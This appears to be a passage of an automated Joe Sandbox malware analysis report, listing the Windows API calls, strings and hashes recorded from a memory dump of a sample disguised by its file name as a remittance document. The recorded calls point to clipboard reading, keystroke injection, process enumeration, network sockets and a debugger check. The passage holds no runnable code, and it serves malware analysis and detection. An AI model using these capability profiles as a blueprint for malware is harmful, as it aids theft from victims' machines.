                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                      • API String ID: 0-2872873767
                                                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                      • __wsplitpath.LIBCMT ref: 00475644
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcscat.LIBCMT ref: 00475657
                                                                      • __wcsicoll.LIBCMT ref: 0047567B
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                      • String ID:
                                                                      • API String ID: 2547909840-0
                                                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                      • FindClose.KERNEL32(?), ref: 004525FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                      • String ID: *.*$\VH
                                                                      • API String ID: 2786137511-2657498754
                                                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID: pqI
                                                                      • API String ID: 2579439406-2459173057
                                                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                      APIs
                                                                      • __wcsicoll.LIBCMT ref: 00433349
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                      • __wcsicoll.LIBCMT ref: 00433375
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicollmouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 1033544147-711622031
                                                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                      • String ID:
                                                                      • API String ID: 3031425849-0
                                                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                      APIs
                                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                      APIs
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • IsWindowVisible.USER32 ref: 0047A368
                                                                      • IsWindowEnabled.USER32 ref: 0047A378
                                                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                      • IsIconic.USER32 ref: 0047A393
                                                                      • IsZoomed.USER32 ref: 0047A3A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                      APIs
                                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                      • CoUninitialize.OLE32 ref: 0047863C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                      APIs
                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                      • String ID:
                                                                      • API String ID: 15083398-0
                                                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: U$\
                                                                      • API String ID: 4104443479-100911408
                                                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 901099227-0
                                                                      • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                      • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                      APIs
                                                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
